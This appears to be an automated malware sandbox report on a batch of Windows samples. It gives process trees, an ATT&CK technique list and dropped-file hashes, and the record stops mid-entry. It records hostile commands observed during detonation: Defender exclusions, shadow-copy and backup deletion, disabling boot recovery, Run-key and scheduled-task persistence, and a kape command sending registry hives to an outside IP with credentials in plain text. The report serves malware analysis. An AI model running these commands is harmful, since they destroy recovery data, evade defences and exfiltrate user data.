- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe'
  2⤵
  PID:3408
- C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe
  "C:\Users\Admin\Desktop\b5bf9b891fdd046d626082bad71ef887a9fcafca9cdfd6887d2e60ef6d4a0462.exe"
  2⤵
  PID:3556
- - C:\Windows\syspolrvcs.exe
    C:\Windows\syspolrvcs.exe
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\2217418379.exe
      C:\Users\Admin\AppData\Local\Temp\2217418379.exe
      4⤵
      PID:6236
    - - C:\Users\Admin\AppData\Local\Temp\254459889.exe
        
        C:\Users\Admin\AppData\Local\Temp\254459889.exe
        5⤵
        
        PID:5436
    - - C:\Users\Admin\AppData\Local\Temp\3345016440.exe
        
        C:\Users\Admin\AppData\Local\Temp\3345016440.exe
        5⤵
        
        PID:5496
    - - C:\Users\Admin\AppData\Local\Temp\2533225544.exe
        
        C:\Users\Admin\AppData\Local\Temp\2533225544.exe
        5⤵
        
        PID:4224
  - - C:\Users\Admin\AppData\Local\Temp\3353523674.exe
      C:\Users\Admin\AppData\Local\Temp\3353523674.exe
      4⤵
      PID:6696
  - - C:\Users\Admin\AppData\Local\Temp\2519015571.exe
      C:\Users\Admin\AppData\Local\Temp\2519015571.exe
      4⤵
      PID:3404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\cdm.exe'
  2⤵
  PID:3700
- C:\Users\Admin\Desktop\cdm.exe
  "C:\Users\Admin\Desktop\cdm.exe"
  2⤵
  PID:3052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\check_Registry.exe'
  2⤵
  PID:4220
- C:\Users\Admin\Desktop\check_Registry.exe
  "C:\Users\Admin\Desktop\check_Registry.exe"
  2⤵
  PID:4564
- - C:\Users\Admin\AppData\Local\Temp\kape.exe
    "C:\Users\Admin\AppData\Local\Temp\kape.exe" --tsource C: --tdest SLVJLBBW\Target --target RegistryHivesUser --scs 79.174.93.239 --scp 22 --scu smartfiles --scpw "testsSBfilestransfer!!!!!" --scd uploads --vhdx VHDXInfo
    3⤵
    PID:4652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Choc.exe'
  2⤵
  PID:4300
- C:\Users\Admin\Desktop\Choc.exe
  "C:\Users\Admin\Desktop\Choc.exe"
  2⤵
  PID:4468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ColorCs.exe'
  2⤵
  PID:3172
- C:\Users\Admin\Desktop\ColorCs.exe
  "C:\Users\Admin\Desktop\ColorCs.exe"
  2⤵
  PID:4248
- - C:\Users\Admin\AppData\Local\Temp\bootrec.exe
    "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
    3⤵
    PID:5852
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
      4⤵
      Creates scheduled task(s)
      PID:2960
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    PID:5872
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
    3⤵
    PID:5348
- - C:\Windows\System32\control.exe
    "C:\Windows\System32\control.exe"
    3⤵
    PID:5172
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\devmgmt.msc"
    3⤵
    PID:6176
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:6988
- - C:\Windows\System32\mmc.exe
    "C:\Windows\System32\mmc.exe"
    3⤵
    PID:5356
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\diskmgmt.msc"
    3⤵
    PID:5828
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe"
    3⤵
    PID:6264
- - C:\Windows\System32\mstsc.exe
    "C:\Windows\System32\mstsc.exe"
    3⤵
    PID:6888
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\System32\taskschd.msc"
    3⤵
    PID:7132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe'
  2⤵
  PID:2804
- C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
  "C:\Users\Admin\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
  2⤵
  PID:5232
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - Views/modifies file attributes
    PID:5452
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5460
- - C:\Users\Admin\Desktop\taskdl.exe
    taskdl.exe
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 47251712688185.bat
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - Views/modifies file attributes
    PID:4344
- - C:\Users\Admin\Desktop\taskdl.exe
    taskdl.exe
    3⤵
    PID:5408
- - C:\Users\Admin\Desktop\@[email protected]
    @[email protected] co
    3⤵
    PID:6872
  - - C:\Users\Admin\Desktop\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      PID:6692
  - - C:\Users\Admin\Desktop\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      PID:1264
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    PID:3452
  - - C:\Users\Admin\Desktop\@[email protected]
      @[email protected] vs
      4⤵
      PID:1104
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:3876
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        
        PID:5780
- - C:\Users\Admin\Desktop\taskdl.exe
    taskdl.exe
    3⤵
    PID:7112
- - C:\Users\Admin\Desktop\taskse.exe
    taskse.exe C:\Users\Admin\Desktop\@[email protected]
    3⤵
    PID:1960
- - C:\Users\Admin\Desktop\@[email protected]
    @[email protected]
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xribzlwi746" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
    3⤵
    PID:864
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xribzlwi746" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
      4⤵
      Modifies registry key
      PID:7096
- - C:\Users\Admin\Desktop\taskdl.exe
    taskdl.exe
    3⤵
    PID:6200
- - C:\Users\Admin\Desktop\taskdl.exe
    taskdl.exe
    3⤵
    PID:5588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\EGN RU1.exe'
  2⤵
  PID:5248
- C:\Users\Admin\Desktop\EGN RU1.exe
  "C:\Users\Admin\Desktop\EGN RU1.exe"
  2⤵
  PID:5444
- - C:\Users\Admin\AppData\Local\Temp\sustem32.exe
    "C:\Users\Admin\AppData\Local\Temp\sustem32.exe"
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\hyperwebfont\JNbMKTHQeeisaNE5gWwcccFtQuC.vbe"
      4⤵
      PID:5804
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hyperwebfont\yIgYU9c1z9H1xn6Tye0KRsv0DdNxWg4dhb8r4Zd.bat" "
        5⤵
        
        PID:6412
      - C:\hyperwebfont\portWebsavesRuntimeSvc.exe
        
        "C:\hyperwebfont/portWebsavesRuntimeSvc.exe"
        6⤵
        
        PID:4716
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zgKa0ApnzX.bat"
        7⤵
        
        PID:3396
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:7140
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:6372
        
        C:\Program Files\Windows Media Player\it-IT\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
        
        "C:\Program Files\Windows Media Player\it-IT\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
        8⤵
        
        PID:4272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\75OpyD0wFt.bat"
        9⤵
        
        PID:888
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:5880
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        Runs ping.exe
        
        PID:3276
        
        C:\Program Files\Windows Media Player\it-IT\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
        
        "C:\Program Files\Windows Media Player\it-IT\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
        10⤵
        
        PID:5268
- - C:\Users\Admin\AppData\Local\Temp\EGN RU.exe
    "C:\Users\Admin\AppData\Local\Temp\EGN RU.exe"
    3⤵
    PID:7092
  - - C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\System32\notepad.exe" C:\hwid.ini
      4⤵
      Opens file in notepad (likely ransom note)
      PID:5396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\fauxinity.exe'
  2⤵
  PID:5372
- C:\Users\Admin\Desktop\fauxinity.exe
  "C:\Users\Admin\Desktop\fauxinity.exe"
  2⤵
  PID:5288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Getaparane.exe'
  2⤵
  PID:5816
- C:\Users\Admin\Desktop\Getaparane.exe
  "C:\Users\Admin\Desktop\Getaparane.exe"
  2⤵
  PID:6524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Hexachlorocyclohexane.exe'
  2⤵
  PID:6440
- C:\Users\Admin\Desktop\Hexachlorocyclohexane.exe
  "C:\Users\Admin\Desktop\Hexachlorocyclohexane.exe"
  2⤵
  PID:6484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Hydromatic.exe'
  2⤵
  PID:3048
- C:\Users\Admin\Desktop\Hydromatic.exe
  "C:\Users\Admin\Desktop\Hydromatic.exe"
  2⤵
  PID:3992
- - C:\Users\Admin\AppData\Local\Temp\偲踲婲鐲驲砲穲騲偲踲婲鐲驲砲穲騲.exe
    "C:\Users\Admin\AppData\Local\Temp\偲踲婲鐲驲砲穲騲偲踲婲鐲驲砲穲騲.exe"
    3⤵
    PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\intdust.exe'
  2⤵
  PID:5340
- C:\Users\Admin\Desktop\intdust.exe
  "C:\Users\Admin\Desktop\intdust.exe"
  2⤵
  PID:4980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Kayflockmp4.exe'
  2⤵
  PID:4876
- C:\Users\Admin\Desktop\Kayflockmp4.exe
  "C:\Users\Admin\Desktop\Kayflockmp4.exe"
  2⤵
  PID:1116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\KKK.exe'
  2⤵
  PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1868 -ip 1868
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1868 -ip 1868
1⤵
PID:4548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4696 -ip 4696
1⤵
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1368 -ip 1368
1⤵
PID:2732

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a8 0x4d8
1⤵
PID:4048

C:\ProgramData\Microsoft Storge.exe
"C:\ProgramData\Microsoft Storge.exe"
1⤵
PID:3408

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
PID:6908
- C:\Windows\SysWOW64\NETSTAT.EXE
  "C:\Windows\SysWOW64\NETSTAT.EXE"
  2⤵
  - Gathers network information
  PID:6104
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:5504

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:5440

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:6384

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:6912

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\8bf10c9eb8274ff0ba940de8b3e30d19 /t 5336 /p 5348
1⤵
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3932 -ip 3932
1⤵
PID:6080

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\a59500a44c6e493996c184958ac95ec9 /t 3500 /p 3392
1⤵
PID:1704

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:7008

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:5272

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\a5b4912c57094586b637f8182644cd65 /t 5932 /p 7008
1⤵
PID:4188

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4784

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2436

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\deb32fae902c4c1e909bdf2488da595e /t 4200 /p 4784
1⤵
PID:6080

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:7068

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2740

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:6344

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2452

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4484

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:5156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\cmd.exe

Filesize
3.5MB

MD5
d6203e407a0e2dc8a7b335d290f5b871

SHA1
883272a32627509544c84f114d2081cd11976945

SHA256
b13ba52779289565a4e8c8830e01f70547076a8422944381e90b781fccf8ef9f

SHA512
7a0dd6891793cf906ac4de58f0be700e093a050c863565c33807605541841a19d219208937310a8d3cf310ba26cb65bed5e9f48c0c5fd1f21a61da0eec8a241a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

Filesize
1024KB

MD5
30ce05521c028924888c31f6722c14b9

SHA1
bcae50c2ab7ccbf71c9b4e2923a6cb54b0bc1a96

SHA256
da3d078ea6543bb8c36afc1abe19e902c74cb167ba77e7b04652a22edac48dfd

SHA512
f8d43b49bf721658ab7549cd7cc7ce8e3ad4cba53dd963b2a55aa8c612eccc0e75bb3b15f6959f3b35890fcaf9fb2164617007d5d4d982e1833467844fe56691

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
7KB

MD5
740ab836f98f3b212cdcff92802903ea

SHA1
0e6bf875be22f848a38c6d92272e99b69ae45ae1

SHA256
1dcd999aa76a3a588ff89bdfa6b1e505c6d41225c5e8d1ad285c3186c098001a

SHA512
61a008fc78023904664039402081f1fefb1a65f10c1f1906817b74bbffbaeccaa7a372fcfa28475c01895745b97746afd727d8c8c57e3f1a4c7b52ffed9626b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5afb2e6ea0396df69c8d082b7c0111b5

SHA1
ed3fe21a7591d295581a3270c0804e88ac9d3fde

SHA256
0cdd39b0d1adb03a8262ac587582c571c02a4c0d4767fe2094150d33eb1946b4

SHA512
d58837e7782e157189e3319fef42dcceaf68474d6d219b02d926580617ec10efd5b77294259e539b3b298b9844318d943a5d92b6408500454d67684319df8a16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2524e72b0573fa94e9cb8089728a4b47

SHA1
3d5c4dfd6e7632153e687ee866f8ecc70730a0f1

SHA256
fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747

SHA512
99a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

SHA512
ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
de84eafd95ec8565eec7fdeb6bafc212

SHA1
7e7931f2856768a9053984421de919290b2131cf

SHA256
7c3500462cc304f7a8d297abc52cf0795092b5cfc5d32052017c9ac34e3093dc

SHA512
3d533f5c9114dd9f71d3a3bbdea7039bc3a6922b5e65310ece1949de15a69a70573fce813d224399b2f7ef5291f8261f9823cd0b26f01ecfa71296b00ff67d4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c08aea9c78561a5f00398a723fdf2925

SHA1
2c880cbb5d02169a86bb9517ce2a0184cb177c6e

SHA256
63d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7

SHA512
d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
574ff64bf76afb475881c1f935f0eed4

SHA1
4d4f7d308cd3777d2cc6f4e26aa57f341c164565

SHA256
2a1b2a0074d16b55261614f5778395013537a482758e1674c6c64dda558410ce

SHA512
285677ef1e36e04cddfd00f4cd142da66790f5d587aba414287fea18a499af820c6bb18bb2d8f197a724e13fb812bd3c2421710c782c3f6b96b0dd5dd8c5316d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6f3b96b24f06e2d37a46e43e8b784f56

SHA1
7be6702c5867f359e913eeeecdd5b76698589295

SHA256
8e386afeed28e1d282d9a0294dd2e9402dcb807f7c77aca8426314c20057e720

SHA512
d760999531a77a9adf2b4dc019ce3b43ac3a8cad825398b3a09818afe8deaa177d37219a26dd8a432c00c9cff7858efc43cae2375edc996bb0136c92c39c9dfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dd1d0b083fedf44b482a028fb70b96e8

SHA1
dc9c027937c9f6d52268a1504cbae42a39c8d36a

SHA256
cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

SHA512
96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

Download Submit
C:\Users\Admin\AppData\Local\Temp\2533225544.exe

Filesize
8KB

MD5
80f97c916a3eb0e5663761ac5ee1ddd1

SHA1
4ee54f2bf257f9490eaa2c988a5705ef7b11d2bc

SHA256
9e06f61d715b1b88507e3e70390721ab7ab35d70fe2df6edaaf0e565783e7d2f

SHA512
85e30cfc5c02543820f884602701986aa1e40d587da13c35b76b80dc95c0d6b3e18f5b0ad083fcfa3e9b92935306e4f8faec36ac28ac25e53fb03dcba4a092a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\EGN RU.exe

Filesize
1.1MB

MD5
b7513bb58f850ac7bdf8ec670373422b

SHA1
e526db0ed08278a31937d64d009c1e5f7e26027b

SHA256
57747f058e5245542ea8c55f2dcf09b1dc15f099cbec4c501ca412eafba46971

SHA512
78edb04bfafa6697f53b96bff3f44d8d47f0414e76c0e58a16fa0d6dfba3d6c1cb7290e94b5026dc90c49cb6f666894c78a6d74bc41b7adff19a3c8b174e162a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
112B

MD5
8c68c8ed8ce1f10ca21ee4ac5e2847c1

SHA1
a0b3a10f9092c3ccfd7ccd98849562f9d10686e6

SHA256
1340d6192ac8af2b72d3dd52784aa7b9e9916c84b5284815524b91b2519874d1

SHA512
dff64fe5885a3619a9195ab6e981c9ca7284b1addd2a3268f067a90da090f258f0171a18c05fce064f8448842b7167cdaa0112b8ff169004b897d98589137f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
452B

MD5
61ec5fb8a74bb3647bc0d118d3b0993e

SHA1
7d7dfb3e978927d109ad361d589f6b5d7489b23f

SHA256
ce6106f8797030a2b16c9211a7ed6bd1883d88601778b47fc8757db8e26c44fe

SHA512
5eb7f67eed95eb9359373de0f188a5f872afcddf2ce6c4a8467d7356bf619527c4420f9507bd4f3975f1dd85e77231aa24f01bde0894c04b9f052d277f619839

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
508B

MD5
386f5f25024e5463a29f0f40457250b2

SHA1
